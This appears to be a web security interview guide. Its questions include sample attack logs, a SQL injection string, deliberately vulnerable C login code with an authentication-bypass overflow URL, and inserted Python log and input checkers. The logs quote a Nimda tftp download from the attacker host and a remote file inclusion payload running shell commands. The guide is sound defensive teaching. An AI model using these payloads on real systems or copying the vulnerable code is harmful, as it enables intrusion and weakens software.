
Web Security Interview Questions

The goal of this document is to provide appropriate questions for HR/Managers to pose to individuals who are applying for web security related positions. These questions do not have right or wrong answers, but rather spark relevant conversation between the applicant and the hiring staff.
Entry Level Questions
1. What do you see as the most critical and current threats affecting Internet accessible websites?
Goal of question - To gauge the applicant's knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).
2. What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?
Goal of question - Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.
3. What do you see as challenges to successfully deploying/monitoring web intrusion detection?
Goal of question - We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:
- Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
- Proper logging - increasing the verboseness of logging (Mod_Security audit_log)
- Remote Centralized Logging
- Alerting Mechanisms
- Updating Signatures/Policies
4. What is your definition of the term "Cross-Site Scripting"? What is the potential impact to servers and clients?
Goal of question - This question will determine if the applicant is well versed in the terminology used in web security. The applicant needs to be able to articulate highly technological topics to a wide audience. The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information. WASC has a web security glossary of terms that may be of help - http://www.webappsec.org/glossary.html
Cross-Site Scripting: (Acronym XSS) An attack technique that forces a web site to echo client-supplied data, which executes in a user's web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client. The web server is merely used as a conduit for the XSS data to be presented to the end client. See also "Client-Side Scripting".

5. What are the most important steps you would recommend for securing a new web server? Web application?
Goal of question - Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.
Web Server Security:
- Update/Patch the web server software
- Minimize the server functionality - disable extra modules
- Delete default data/scripts
- Increase logging verboseness
- Update Permissions/Ownership of files
Web Application Security:
- Make sure Input Validation is enforced within the code - Security QA testing
- Configured to display generic error messages
- Implement a software security policy
- Remove or protect hidden files and directories
Advanced Level Questions
1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2068.48.142.117%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 566 "-" "-"
Goal of question - To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.
If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
You could use either Microsoft's Internet Security and Acceleration (ISA) Server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.
2. You are engaged in a penetration-test where you are attempting to gain access to a protected location. You are presented with this login screen:
What are some examples of how you would attempt to gain access?
Goal of question - Determine if the applicant has a wide knowledge of different authentication vulnerabilities. They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as - ' OR 1=1). If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.
ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '='.
Data Source = "ECommerceTheArchSupport2"
SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file E:\Inetpub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is: E:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM
This error message indicates that the target web application is running Microsoft SQL and discloses directory structures.
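To turn the "display generic error messages" item from entry-level question 5 into a check, here is an added Python example, not from the original document, that scans a response body for the kinds of disclosure visible in the error page above: the ODBC error code, the driver name, the data source, the SQL text, ColdFusion tag names and Windows file paths. The error text is the one quoted in the question; the signature regexes, the result keys and the generic page are my own constructions.

```python
import re

# Constructed sample: the verbose error page quoted in the question above.
ERROR_PAGE = r"""ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '='.
Data Source = "ECommerceTheArchSupport2"
SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file E:\Inetpub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is: E:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM
"""

# Constructed sample of what a generic error page should look like instead.
GENERIC_PAGE = "An error occurred while processing your request. Please try again later."

# Each signature: (finding name, regex). A hit means the page reveals something a
# generic error page should keep to itself. Group 1 (or the whole match) is reported.
SIGNATURES = [
    ("odbc_error_code", re.compile(r"ODBC Error Code\s*=\s*(\d+)")),
    ("db_driver", re.compile(r"\[Microsoft\]\[ODBC ([^\]]+) Driver\]")),
    ("data_source", re.compile(r'Data Source\s*=\s*"([^"]+)"')),
    ("sql_statement", re.compile(r'SQL\s*=\s*"([^"]+)"')),
    ("windows_path", re.compile(r"""\b[A-Za-z]:\\[^\s"']+""")),   # drive-letter paths
    ("coldfusion_tag", re.compile(r"\((CF[A-Z]+)\)")),             # e.g. (CFQUERY)
]

def scan_error_page(body):
    """Map each disclosure type found in body to the sorted set of values it leaked."""
    findings = {}
    for name, rx in SIGNATURES:
        hits = rx.findall(body)
        if hits:
            findings[name] = sorted(set(hits))
    return findings

def discloses_too_much(body):
    """True when the response leaks database engine, query text or filesystem details."""
    return bool(scan_error_page(body))

if __name__ == "__main__":
    for name, values in scan_error_page(ERROR_PAGE).items():
        print(f"{name}: {values}")
    print("generic page flagged:", discloses_too_much(GENERIC_PAGE))
```

The same scanner can be pointed at the responses of a security QA run: any page for which discloses_too_much() is true should be routed to a generic error handler that logs the detail server-side and shows the client nothing but a reference id.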
3. What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?
========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: Keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
Goal of question - to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:
- The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
- The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.
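An added Python example, not from the original document, that parses the Mod_Security 1.x audit_log record above the way an analyst reads it: the summary header, the request line and headers, and the logged POST payload. It decides from the mod_security-action/status pair whether the request was blocked, pulls the matched pattern and its location out of mod_security-message, flags the parameter whose value is itself a URL (the file inclusion), and splits the cmd parameter on ";" as a Bourne shell would, so the lsuname typo shows up as one unknown command. The record is copied from the question (trimmed to the headers the analysis uses); the result field names are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the Mod_Security 1.x audit_log record quoted in the question.
AUDIT_RECORD = r"""========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
"""

REQUEST_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" (?P<status>\d{3}) \S+')
MATCH_RE = re.compile(r'Pattern match "(?P<pattern>.*)" at (?P<where>\S+)')

def split_record(text):
    """Split one audit_log record into (summary, request_line, headers, declared_len, body)."""
    lines = text.strip("\n").splitlines()
    i = 0
    while i < len(lines) and lines[i].startswith("="):      # leading "====" separator
        i += 1
    summary = {}
    while i < len(lines) and not lines[i].startswith("-"):  # Request:/Handler: block
        key, _, value = lines[i].partition(":")
        summary[key.strip()] = value.strip()
        i += 1
    i += 1                                                   # the "----" separator
    request_line = lines[i]
    i += 1
    headers = {}
    while i < len(lines) and lines[i]:                       # headers up to the blank line
        key, _, value = lines[i].partition(":")
        headers[key.strip().lower()] = value.strip()
        i += 1
    body_lines = lines[i + 1:]                               # skip the blank line
    declared_len = None
    if body_lines and body_lines[0].isdigit():               # length line precedes the payload
        declared_len = int(body_lines.pop(0))
    return summary, request_line, headers, declared_len, "\n".join(body_lines)

def parse_form_body(body):
    """Decode x-www-form-urlencoded data, splitting only on '&' so ';' stays in the values."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def analyse_record(text):
    summary, request_line, headers, declared_len, body = split_record(text)
    m = REQUEST_RE.match(summary.get("Request", ""))
    status = int(m.group("status")) if m else None
    pm = MATCH_RE.search(headers.get("mod_security-message", ""))
    params = parse_form_body(body)
    # Remote file inclusion attempt: a parameter whose value is a URL.
    remote = next((v for v in params.values()
                   if v.lower().startswith(("http://", "https://", "ftp://"))), None)
    # Commands as the shell would see them: first word of each ';'-separated segment.
    cmd = params.get("cmd", "")
    commands = [seg.strip().split()[0] for seg in cmd.split(";") if seg.strip()]
    return {
        "client": m.group("client") if m else None,
        "request_line": request_line,
        "status": status,
        "blocked": headers.get("mod_security-action") == "403" and status == 403,
        "matched_pattern": pm.group("pattern") if pm else None,
        "match_location": pm.group("where") if pm else None,
        "remote_include": remote,
        "commands": commands,
        "body_length_ok": declared_len is None or declared_len == len(body),
    }

if __name__ == "__main__":
    for key, value in analyse_record(AUDIT_RECORD).items():
        print(f"{key}: {value}")
```

The body_length_ok field compares the logged length line with the payload actually captured; a mismatch on a real record usually means the audit entry was truncated and the analysis below it is working from partial data.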
4. One of your web servers is logging multiple requests similar to the following:
201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"
What does this log entry indicate? How could you identify what the contents are of the "hacked.htm" file that the attacker is trying to upload?
Goal of question - Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT Method), as well as, the logging limitations of CLF. In this type of attack, the defacement text is sent in the request body and not on the URL Request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule -
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)
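The Nimda proxy log in advanced question 1 and the PUT defacement log in this question both come down to reading CLF and reasoning about what the format does and does not record. The following added Python example (not part of the original document) parses the three log lines quoted on this page with a CLF regex, runs a small set of detection rules over them, and correlates the 200 answered to the cmd.exe probe with the later tftp request from the same host, which is exactly the reasoning the answer to question 1 asks for. The rule names and the analyst notes are my own.

```python
import re

# Constructed sample: the three CLF lines quoted in advanced questions 1 and 4.
SAMPLE_LOG = [
    '68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"',
    r'68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2068.48.142.117%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 566 "-" "-"',
    '201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"',
]

# Common Log Format, with the two optional trailing quoted fields of the combined format.
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)

def parse_clf(line):
    """Return the fields of one CLF line as a dict, or None if the line does not parse."""
    m = CLF_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

# Detection rules: (name, predicate over a parsed record). Only the request line is
# available in CLF, so every rule here is a property of method, path or status.
RULES = [
    ("cmd.exe traversal", lambda r: "cmd.exe" in r["path"].lower()),
    ("tftp transfer in URL", lambda r: "tftp" in r["path"].lower()),
    ("PUT to web root", lambda r: r["method"].upper() == "PUT"),
]

def analyse(lines):
    """Run RULES over CLF lines, correlating a 200 on the probe with a later tftp request."""
    findings = []
    probe_succeeded = set()          # hosts whose cmd.exe probe was answered with 200
    for n, line in enumerate(lines, 1):
        rec = parse_clf(line)
        if rec is None:
            findings.append({"line": n, "rule": "unparsable", "host": None, "status": None, "note": ""})
            continue
        for name, pred in RULES:
            if not pred(rec):
                continue
            note = ""
            if name == "cmd.exe traversal" and rec["status"] == 200:
                probe_succeeded.add(rec["host"])
                note = "probe answered 200: check the back-end server, not just the proxy"
            elif name == "tftp transfer in URL" and rec["host"] in probe_succeeded:
                note = "second-stage request after a successful probe"
            elif name == "PUT to web root":
                note = "request body is not in CLF; capture traffic (e.g. a Snort rule) to see it"
            findings.append({"line": n, "rule": name, "host": rec["host"],
                             "status": rec["status"], "note": note})
    return findings

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"line {f['line']}: {f['rule']} from {f['host']} (status {f['status']}) {f['note']}")
```

The PUT finding carries no content because CLF never has any: the note is the same conclusion the answer draws, that a packet capture or the Snort rule above is needed to see what hacked.htm contained.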
5. You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this -
"GET /cgi-bin/logon_validate?login=test&password=test"
The source code is shown below

#include <stdlib.h>
#include <string.h>

void show_error(void) {
  // AUTHENTICATION ERROR
  exit(-1);
}

int main(int argc, char **argv) {
  char error_on_auth='1';
  char user[128];
  char pass[128];
  char *ch_ptr_begin;
  char *ch_ptr_end;
  /**********************************/
  /* Get Username from Query String */
  /**********************************/
  ch_ptr_begin=(char *)strstr(****QUERY_STRING****,"login=");
  if (ch_ptr_begin==NULL)
    show_error();
  ch_ptr_begin+=6;
  ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
  if (ch_ptr_end==NULL)
    show_error();
  *(ch_ptr_end++)='\0';
  strcpy(user,ch_ptr_begin);           /* unbounded copy into user[128] */
  /**********************************/
  /* Get Password from Query String */
  /**********************************/
  ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");
  if (ch_ptr_begin==NULL)
    show_error();
  ch_ptr_begin+=9;
  ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
  if (ch_ptr_end!=NULL) *(ch_ptr_end++)='\0';
  strcpy(pass,ch_ptr_begin);           /* unbounded copy into pass[128] */
  if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0))
    error_on_auth='0';
  if (error_on_auth=='0') {
    // AUTHENTICATION OK!!
  } else {
    // AUTHENTICATION ERROR
    show_error();
  }
  // return(0); hehe could be evil ;PPPPP
  exit(0);
}
This pseudo-code is taken from the NGSec Web Auth Games http://quiz.ngsec.biz:8080/game1/level5/replicant.php
Do you see any problems with this script? How could an attacker exploit this script to bypass the authentication mechanisms in this script? What are some mitigation options?
Goal of question - This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.
Reference "Smashing The Stack For Fun And Profit" for technical details - http://www.phrack.org/phrack/49/P49-14
The security issue with this script has to do with a buffer overflow problem in the way that the script is using the "error_on_auth" condition. The error_on_auth condition is initially declared to be "1" which means that the user is not authenticated. The "user" condition was declared directly after the error_on_auth and has been allocated 128 bytes. Due to the ordering of the declaration of the error_on_auth and user parameters, they occupy adjacent locations on the running stack. The result is that if the attacker submits a username that is 129 bytes (with the last byte being "0"), they can overwrite the error_on_auth data. A Unix command such as the following would achieve this goal -
http://www.companyx.com/cgi-bin/validate_logon?logon=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Mitigation options include the following:
- Update the validate_logon source code to fix the problem, such as using strncpy() instead of strcpy().
- If the source code could not be updated, then security filters would need to be implemented on the web server. Using Mod_Security, you could implement some security filters for the "validate_logon" URL such as these:
o Only allow letters in the username argument. This would prevent the client from overwriting the error_on_auth data with a zero.
<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]"
</Location>
o You could also add another rule to restrict the size of the username/password arguments to be less than 129 characters.
<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]"
SecFilterSelective ARG_LOGIN|ARG_PASSWORD ".{129,}"
</Location>
- A web application firewall (WAF) device could be implemented on the network to protect the entire web site. These devices have positive policy capability that should identify these types of attacks as "anomalous" and deny them. A brief listing of WAF vendors include Teros, Netcontinuum, Imperva, Watchfire, Breach, Axiliance, and others.
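The Mod_Security filters above enforce two properties of the login parameter from outside the binary: only letters, and a length that cannot reach error_on_auth. As an added Python example, not from the original document or the NGSec game, here is the same pair of checks applied to a request URL, together with a helper that computes how many bytes strcpy() would write past the 128-byte user buffer for a given value. The buffer size comes from the listing; the sample requests, the 127-character limit and the function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

USER_BUF = 128                 # size of user[] and pass[] in the listing above
MAX_LEN = USER_BUF - 1         # longest value strcpy() can store together with its NUL terminator
LETTERS = re.compile(r"[A-Za-z]+")

# Constructed sample requests (the parameter names follow the code, which looks for "login=").
GOOD_REQUEST = "http://www.companyx.com/cgi-bin/validate_logon?login=test&password=test"
OVERFLOW_REQUEST = "http://www.companyx.com/cgi-bin/validate_logon?login=" + "0" * 129 + "&password=x"

def bytes_past_buffer(value):
    """How many bytes strcpy(user, value) writes beyond user[USER_BUF], terminator included."""
    return max(0, len(value) + 1 - USER_BUF)

def check_logon_request(url):
    """Return (ok, reasons): the policy the two SecFilterSelective rules express, applied to a URL."""
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    reasons = []
    for name in ("login", "password"):
        value = params.get(name)
        if value is None:
            reasons.append(f"{name}: missing")
            continue
        if len(value) > MAX_LEN:
            reasons.append(f"{name}: {len(value)} bytes exceeds {MAX_LEN} "
                           f"(would write {bytes_past_buffer(value)} byte(s) past the buffer)")
        if name == "login" and not LETTERS.fullmatch(value):
            reasons.append("login: non-letter characters")
    return (not reasons, reasons)

if __name__ == "__main__":
    for url in (GOOD_REQUEST, OVERFLOW_REQUEST):
        ok, why = check_logon_request(url)
        print("accept" if ok else "reject", url[:70] + ("..." if len(url) > 70 else ""), why)
```

Note that strcpy() also copies the terminating NUL, so a 128-character value already writes one byte past user[]; the example therefore caps values at 127 characters, one tighter than the ".{129,}" filter on the page, and bytes_past_buffer() makes that arithmetic visible for any candidate value.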
